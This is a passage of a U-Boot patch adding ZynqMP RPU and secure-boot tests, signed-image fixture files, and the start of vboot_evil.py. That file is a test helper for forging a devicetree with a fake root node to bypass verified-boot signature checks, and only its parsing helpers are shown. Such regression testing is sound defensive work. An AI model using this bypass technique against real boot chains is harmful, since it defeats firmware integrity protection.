+ +Example: +env__zynqmp_rpu_apps = { + 'app_name': ['hello_world_r5_0_ddr.elf', 'hello_world_r5_1_ddr.elf'], + 'proc': ['rpu0', 'rpu1'], + 'cpu_num': [4, 5], + 'addr': [0xA00000, 0xB00000], + 'output': ['Successfully ran Hello World application on DDR from RPU0', + 'Successfully ran Hello World application on DDR from RPU1'], + 'tftp_addr': [0x100000, 0x200000], +} +""" + +# Get rpu apps params from env +def get_rpu_apps_env(u_boot_console): + rpu_apps = u_boot_console.config.env.get('env__zynqmp_rpu_apps', False) + if not rpu_apps: + pytest.skip('ZynqMP RPU application info not defined!') + + apps = rpu_apps.get('app_name', None) + if not apps: + pytest.skip('No RPU application found!') + + procs = rpu_apps.get('proc', None) + if not procs: + pytest.skip('No RPU application processor provided!') + + cpu_nums = rpu_apps.get('cpu_num', None) + if not cpu_nums: + pytest.skip('No CPU number for respective processor provided!') + + addrs = rpu_apps.get('addr', None) + if not addrs: + pytest.skip('No RPU application build address found!') + + outputs = rpu_apps.get('output', None) + if not outputs: + pytest.skip('Expected output not found!') + + tftp_addrs = rpu_apps.get('tftp_addr', None) + if not tftp_addrs: + pytest.skip('TFTP address to load application not found!') + + return apps, procs, cpu_nums, addrs, outputs, tftp_addrs + +# Check return code +def ret_code(u_boot_console): + return u_boot_console.run_command('echo $?') + +# Initialize tcm +def tcminit(u_boot_console, rpu_mode): + output = u_boot_console.run_command('zynqmp tcminit %s' % rpu_mode) + assert 'Initializing TCM overwrites TCM content' in output + return ret_code(u_boot_console) + +# Load application in DDR +def load_app_ddr(u_boot_console, tftp_addr, app): + output = u_boot_console.run_command('tftpboot %x %s' % (tftp_addr, app)) + assert 'TIMEOUT' not in output + assert 'Bytes transferred = ' in output + + # Load elf + u_boot_console.run_command('bootelf -p %x' % tftp_addr) + assert ret_code(u_boot_console).endswith('0') + +# Disable cpus +def disable_cpus(u_boot_console, cpu_nums): + for num in cpu_nums: + u_boot_console.run_command(f'cpu {num} disable') + +# Load apps on RPU cores +def rpu_apps_load(u_boot_console, rpu_mode): + apps, procs, cpu_nums, addrs, outputs, tftp_addrs = get_rpu_apps_env( + u_boot_console) + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + try: + assert tcminit(u_boot_console, rpu_mode).endswith('0') + + for i in range(len(apps)): + if rpu_mode == 'lockstep' and procs[i] != 'rpu0': + continue + + load_app_ddr(u_boot_console, tftp_addrs[i], apps[i]) + rel_addr = int(addrs[i] + 0x3C) + + # Release cpu at app load address + cpu_num = cpu_nums[i] + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rpu_mode) + output = u_boot_console.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {hex(rel_addr)}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + u_boot_console.wait_for(outputs[i]) + assert ret_code(u_boot_console).endswith('0') + finally: + disable_cpus(u_boot_console, cpu_nums) + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_split(u_boot_console): + rpu_apps_load(u_boot_console, 'split') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_lockstep(u_boot_console): + rpu_apps_load(u_boot_console, 'lockstep') + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_rpu_app_load_negative(u_boot_console): + apps, procs, cpu_nums, 
addrs, outputs, tftp_addrs = get_rpu_apps_env( + u_boot_console) + + # Invalid commands + u_boot_console.run_command('zynqmp tcminit mode') + assert ret_code(u_boot_console).endswith('1') + + rand_str = ''.join(random.choices(string.ascii_lowercase, k=4)) + u_boot_console.run_command('zynqmp tcminit %s' % rand_str) + assert ret_code(u_boot_console).endswith('1') + + rand_num = random.randint(2, 100) + u_boot_console.run_command('zynqmp tcminit %d' % rand_num) + assert ret_code(u_boot_console).endswith('1') + + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + try: + rpu_mode = 'split' + assert tcminit(u_boot_console, rpu_mode).endswith('0') + + for i in range(len(apps)): + load_app_ddr(u_boot_console, tftp_addrs[i], apps[i]) + + # Run in split mode at different load address + rel_addr = int(addrs[i]) + random.randint(200, 1000) + cpu_num = cpu_nums[i] + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rpu_mode) + output = u_boot_console.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {hex(rel_addr)}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + assert not outputs[i] in output + + # Invalid rpu mode + rand_str = ''.join(random.choices(string.ascii_lowercase, k=4)) + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rand_str) + output = u_boot_console.run_command(cmd) + assert exp_op in output + assert f'Unsupported mode' in output + assert not ret_code(u_boot_console).endswith('0') + + # Switch to lockstep mode, without disabling CPUs + rpu_mode = 'lockstep' + u_boot_console.run_command('zynqmp tcminit %s' % rpu_mode) + assert not ret_code(u_boot_console).endswith('0') + + # Disable cpus + disable_cpus(u_boot_console, cpu_nums) + + # Switch to lockstep mode, after disabling CPUs + output = u_boot_console.run_command('zynqmp tcminit %s' % rpu_mode) + assert 'Initializing TCM overwrites TCM content' in output + assert ret_code(u_boot_console).endswith('0') + + # Run lockstep mode for RPU1 + for i in range(len(apps)): + if procs[i] == 'rpu0': + continue + + load_app_ddr(u_boot_console, tftp_addrs[i], apps[i]) + rel_addr = int(addrs[i] + 0x3C) + cpu_num = cpu_nums[i] + cmd = 'cpu %d release %x %s' % (cpu_num, rel_addr, rpu_mode) + output = u_boot_console.run_command(cmd) + exp_op = f'Using TCM jump trampoline for address {hex(rel_addr)}' + assert exp_op in output + assert f'R5 {rpu_mode} mode' in output + assert u_boot_console.p.expect([outputs[i]]) + finally: + disable_cpus(u_boot_console, cpu_nums) + # This forces the console object to be shutdown, so any subsequent test + # will reset the board back into U-Boot. + u_boot_console.drain_console() + u_boot_console.cleanup_spawn() diff --git a/test/py/tests/test_zynqmp_secure.py b/test/py/tests/test_zynqmp_secure.py new file mode 100644 index 00000000000..570bd2439c1 --- /dev/null +++ b/test/py/tests/test_zynqmp_secure.py @@ -0,0 +1,104 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re +import u_boot_utils +import test_net + +""" +This test verifies different type of secure boot images loaded at the DDR for +AMD's ZynqMP SoC. + +Note: This test relies on boardenv_* containing configuration values to define +the files to be used for testing. Without this, this test will be automatically +skipped. It also relies on dhcp or setup_static net test to support tftp to +load files from a TFTP server. 
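The central check in both tests below is that the address reported by the
'zynqmp secure' command matches the zynqmp_verified_img_addr variable; a
condensed sketch of that logic (addr comes from the boardenv or from
u_boot_utils.find_ram_base()):

    output = u_boot_console.run_command('zynqmp secure %x $filesize' % addr)
    ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1)
    env_out = u_boot_console.run_command('print zynqmp_verified_img_addr')
    assert f'zynqmp_verified_img_addr={ver_addr}' in env_out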
+ +For example: + +# Details regarding the files that may be read from a TFTP server. This +# variable may be omitted or set to None if zynqmp secure testing is not +# possible or desired. +env__zynqmp_secure_readable_file = { + 'fn': 'auth_bhdr_ppk1.bin', + 'enckupfn': 'auth_bhdr_enc_kup_load.bin', + 'addr': 0x1000000, + 'keyaddr': 0x100000, + 'keyfn': 'aes.txt', +} +""" + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_secure_boot_image(u_boot_console): + """This test verifies secure boot image at the DDR address for + authentication only case. + """ + + f = u_boot_console.config.env.get('env__zynqmp_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynqmp secure cases to read') + + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + expected_tftp = 'Bytes transferred = ' + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + output = u_boot_console.run_command('zynqmp secure %x $filesize' % (addr)) + assert 'Verified image at' in output + ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + output = u_boot_console.run_command('print zynqmp_verified_img_addr') + assert f'zynqmp_verified_img_addr={ver_addr}' in output + assert 'Error' not in output + + +@pytest.mark.buildconfigspec('cmd_zynqmp') +def test_zynqmp_secure_boot_img_kup(u_boot_console): + """This test verifies secure boot image at the DDR address for encryption + with kup key case. + """ + + f = u_boot_console.config.env.get('env__zynqmp_secure_readable_file', None) + if not f: + pytest.skip('No TFTP readable file for zynqmp secure cases to read') + + test_net.test_net_dhcp(u_boot_console) + if not test_net.net_set_up: + test_net.test_net_setup_static(u_boot_console) + + keyaddr = f.get('keyaddr', None) + if not keyaddr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + keyfn = f['keyfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (keyaddr, keyfn)) + assert expected_tftp in output + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + expected_tftp = 'Bytes transferred = ' + fn = f['enckupfn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + assert expected_tftp in output + + output = u_boot_console.run_command( + 'zynqmp secure %x $filesize %x' % (addr, keyaddr) + ) + assert 'Verified image at' in output + ver_addr = re.search(r'Verified image at 0x(.+)', output).group(1) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + output = u_boot_console.run_command('print zynqmp_verified_img_addr') + assert f'zynqmp_verified_img_addr={ver_addr}' in output + assert 'Error' not in output diff --git a/test/py/tests/vboot/hash-images.its b/test/py/tests/vboot/hash-images.its new file mode 100644 index 00000000000..3ff797288c2 --- /dev/null +++ b/test/py/tests/vboot/hash-images.its @@ -0,0 +1,76 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-0 { 
+ algo = "crc16-ccitt"; + }; + hash-1 { + algo = "crc32"; + }; + hash-2 { + algo = "md5"; + }; + hash-3 { + algo = "sha1"; + }; + hash-4 { + algo = "sha256"; + }; + hash-5 { + algo = "sha384"; + }; + hash-6 { + algo = "sha512"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-0 { + algo = "crc16-ccitt"; + }; + hash-1 { + algo = "crc32"; + }; + hash-2 { + algo = "md5"; + }; + hash-3 { + algo = "sha1"; + }; + hash-4 { + algo = "sha256"; + }; + hash-5 { + algo = "sha384"; + }; + hash-6 { + algo = "sha512"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman-pss.dts b/test/py/tests/vboot/sandbox-binman-pss.dts new file mode 100644 index 00000000000..56e3a42fa6f --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman-pss.dts @@ -0,0 +1,25 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-binman.dts b/test/py/tests/vboot/sandbox-binman.dts new file mode 100644 index 00000000000..b24aeba0fa8 --- /dev/null +++ b/test/py/tests/vboot/sandbox-binman.dts @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + binman { + filename = "sandbox.img"; + + pre-load { + content = <&image>; + algo-name = "sha256,rsa2048"; + key-name = "dev.key"; + header-size = <4096>; + version = <1>; + }; + + image: blob-ext { + filename = "test.fit"; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-kernel.dts b/test/py/tests/vboot/sandbox-kernel.dts new file mode 100644 index 00000000000..a1e853c9caa --- /dev/null +++ b/test/py/tests/vboot/sandbox-kernel.dts @@ -0,0 +1,7 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global-pss.dts b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts new file mode 100644 index 00000000000..c59a68221b9 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global-pss.dts @@ -0,0 +1,28 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + padding-name = "pss"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot-global.dts b/test/py/tests/vboot/sandbox-u-boot-global.dts new file mode 100644 index 00000000000..1409f9e1a10 --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot-global.dts @@ -0,0 +1,27 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; + + image { + pre-load { + sig { + algo-name = "sha256,rsa2048"; + signature-size = <256>; + mandatory = "yes"; + + key-name = "dev"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sandbox-u-boot.dts b/test/py/tests/vboot/sandbox-u-boot.dts new file mode 
100644 index 00000000000..5809c62fc1c --- /dev/null +++ b/test/py/tests/vboot/sandbox-u-boot.dts @@ -0,0 +1,13 @@ +/dts-v1/; + +/ { + model = "Sandbox Verified Boot Test"; + compatible = "sandbox"; + + binman { + }; + + reset@0 { + compatible = "sandbox,reset"; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-algo-arg.its b/test/py/tests/vboot/sign-configs-algo-arg.its new file mode 100644 index 00000000000..3a5bb6d0f73 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-algo-arg.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1-pss.its b/test/py/tests/vboot/sign-configs-sha1-pss.its new file mode 100644 index 00000000000..72a5637e3a1 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha1.its b/test/py/tests/vboot/sign-configs-sha1.its new file mode 100644 index 00000000000..d8bc1fa0919 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha1.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha1"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss-prod.its b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its new file mode 100644 index 00000000000..aac732e304c --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss-prod.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + 
description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "prod"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256-pss.its b/test/py/tests/vboot/sign-configs-sha256-pss.its new file mode 100644 index 00000000000..7bdcc7e286f --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256-pss.its @@ -0,0 +1,46 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha256.its b/test/py/tests/vboot/sign-configs-sha256.its new file mode 100644 index 00000000000..f5591aad305 --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha256.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha256"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-configs-sha384.its b/test/py/tests/vboot/sign-configs-sha384.its new file mode 100644 index 00000000000..2869401991e --- /dev/null +++ b/test/py/tests/vboot/sign-configs-sha384.its @@ -0,0 +1,45 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha384"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version 
= <1>; + hash-1 { + algo = "sha384"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-algo-arg.its b/test/py/tests/vboot/sign-images-algo-arg.its new file mode 100644 index 00000000000..9144c8b5ad8 --- /dev/null +++ b/test/py/tests/vboot/sign-images-algo-arg.its @@ -0,0 +1,40 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1-pss.its b/test/py/tests/vboot/sign-images-sha1-pss.its new file mode 100644 index 00000000000..ded7ae4f552 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1.its b/test/py/tests/vboot/sign-images-sha1.its new file mode 100644 index 00000000000..18c759e9e65 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256-pss.its b/test/py/tests/vboot/sign-images-sha256-pss.its new file mode 100644 index 00000000000..34850cc6c58 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = 
/incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256.its b/test/py/tests/vboot/sign-images-sha256.its new file mode 100644 index 00000000000..bb0f8ee8a66 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha384.its b/test/py/tests/vboot/sign-images-sha384.its new file mode 100644 index 00000000000..be1a9a653c7 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha384.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/simple-images.its b/test/py/tests/vboot/simple-images.its new file mode 100644 index 00000000000..f62786456b8 --- /dev/null +++ b/test/py/tests/vboot/simple-images.its @@ -0,0 +1,36 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot_evil.py b/test/py/tests/vboot_evil.py new file mode 100644 index 00000000000..e2b0cd65468 --- 
/dev/null +++ b/test/py/tests/vboot_evil.py @@ -0,0 +1,486 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, Intel Corporation + +"""Modifies a devicetree to add a fake root node, for testing purposes""" + +import hashlib +import struct +import sys + +FDT_PROP = 0x3 +FDT_BEGIN_NODE = 0x1 +FDT_END_NODE = 0x2 +FDT_END = 0x9 + +FAKE_ROOT_ATTACK = 0 +KERNEL_AT = 1 + +MAGIC = 0xd00dfeed + +EVIL_KERNEL_NAME = b'evil_kernel' +FAKE_ROOT_NAME = b'f@keroot' + + +def getstr(dt_strings, off): + """Get a string from the devicetree string table + + Args: + dt_strings (bytes): Devicetree strings section + off (int): Offset of string to read + + Returns: + str: String read from the table + """ + output = '' + while dt_strings[off]: + output += chr(dt_strings[off]) + off += 1 + + return output + + +def align(offset): + """Align an offset to a multiple of 4 + + Args: + offset (int): Offset to align + + Returns: + int: Resulting aligned offset (rounds up to nearest multiple) + """ + return (offset + 3) & ~3 + + +def determine_offset(dt_struct, dt_strings, searched_node_name): + """Determines the offset of an element, either a node or a property + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + searched_node_name (str): element path, ex: /images/kernel@1/data + + Returns: + tuple: (node start offset, node end offset) + if element is not found, returns (None, None) + """ + offset = 0 + depth = -1 + + path = '/' + + 